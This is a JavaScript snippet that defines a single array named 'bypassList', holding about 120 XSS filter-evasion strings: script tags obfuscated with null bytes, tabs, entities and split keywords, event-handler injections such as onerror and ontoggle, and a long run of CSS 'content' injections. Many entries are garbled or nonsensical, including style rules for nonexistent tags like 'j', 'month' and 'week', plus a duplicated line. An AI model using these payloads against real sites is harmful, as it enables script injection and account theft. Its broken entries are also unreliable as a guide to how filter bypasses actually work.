let bypassList = [
  "<sc+ript></sc+ript>",
  "<sc+[ript].join(\"\")></sc+[ript].join(\"\")>",
  "<s\u0000cript>",
  "<script\u0000a=\"\">",
  "<scr\u0000ipt>",
  "<script/xm\u0000l>",
  "<script\u0001a=\"\">",
  "<scri\\\\tpt>",
  "<scr\\t\\ti\\tp t>",
  "<script\\na=\"\">",
  "<s c+r i p t>",
  "<svg onload=\"<sc+ript>",
  "<img src=x onerror=\"<sc+ript>",
  "<body onready=\"<sc+ript>",
  "<input onfocus=\"<sc+ript>",
  "<textarea onfocus=\"<sc+ript>",
  "<select onchange=\"<sc+ript>",
  "<details open ontoggle=\"<sc+ript>",
  "<video poster=\"x<sc+ript>",
  "<iframe src=\"x<sc+ript>",
  "<frame src=\"x<sc+ript>",
  "<layer src=\"x<sc+ript>",
  "<applet code=\"x<sc+ript>",
  "<math mbase=\"x<sc+ript>",
  "<style>body{&::after{content:\"",
  "<style>p{content:\"",
  "<style>h1{content:\"",
  "<style>div{content:\"",
  "<style>span{content:\"",
  "<style>a{content:\"",
  "<style>ul{content:\"",
  "<style>li{content:\"",
  "<style>table{content:\"",
  "<style>tr{content:\"",
  "<style>td{content:\"",
  "<style>th{content:\"",
  "<style>form{content:\"",
  "<style>input{content:\"",
  "<style>select{content:\"",
  "<style>option{content:\"",
  "<style>fieldset{content:\"",
  "<style>legend{content:\"",
  "<style>button{content:\"",
  "<style>label{content:\"",
  "<style>canvas{content:\"",
  "<style>video{content:\"",
  "<style>audio{content:\"",
  "<style>embed{content:\"",
  "<style>object{content:\"",
  "<style>img{content:\"",
  "<style>figure{content:\"",
  "<style>figcaption{content:\"",
  "<style>section{content:\"",
  "<style>article{content:\"",
  "<style>header{content:\"",
  "<style>footer{content:\"",
  "<style>nav{content:\"",
  "<style>aside{content:\"",
  "<style>main{content:\"",
  "<style>mark{content:\"",
  "<style>ruby{content:\"",
  "<style>rt{content:\"",
  "<style>rp{content:\"",
  "<style>datalist{content:\"",
  "<style>meter{content:\"",
  "<style>progress{content:\"",
  "<style>time{content:\"",
  "<style>date{content:\"",
  "<style>month{content:\"",
  "<style>week{content:\"",
  "<style>slot{content:\"",
  "<style>bdi{content:\"",
  "<style>bdo{content:\"",
  "<style>abbr{content:\"",
  "<style>acronym{content:\"",
  "<style>strong{content:\"",
  "<style>em{content:\"",
  "<style>small{content:\"",
  "<style>del{content:\"",
  "<style>ins{content:\"",
  "<style>q{content:\"",
  "<style>cite{content:\"",
  "<style>dfn{content:\"",
  "<style>code{content:\"",
  "<style>samp{content:\"",
  "<style>kbd{content:\"",
  "<style>var{content:\"",
  "<style>sub{content:\"",
  "<style>sup{content:\"",
  "<style>u{content:\"",
  "<style>strike{content:\"",
  "<style>s{content:\"",
  "<style>i{content:\"",
  "<style>j{content:\"",
  "<style>l{content:\"",
  "<style>p{content:\"",
  "<style>r{content:\"",
  "<style>x{content:\"",
  "<style>c{content:\"",
  "<style>m{content:\"",
  "<style>n{content:\"",
  "<style>v{content:\"",
  "<style>d{content:\"",
  "<style>w{content:\"",
  "<style>e{content:\"",
  "<style>script{content:\"",
  "<script%20>",
  "<script&#34;>",
  "<script&#x34;>",
  "<script&#x2F>",
  "<scrip&#x74;t>",
  "<script a=`x`>",
  "<script src=`x`>",
  "<script html=\"\">",
  "<script text=\"\">",
  "<script void=\"\">",
  "<script>\"",
  "<scri\\\\tpt a>",
  "<script\\ta\\na>",
  "<script\\na\\na>"
]
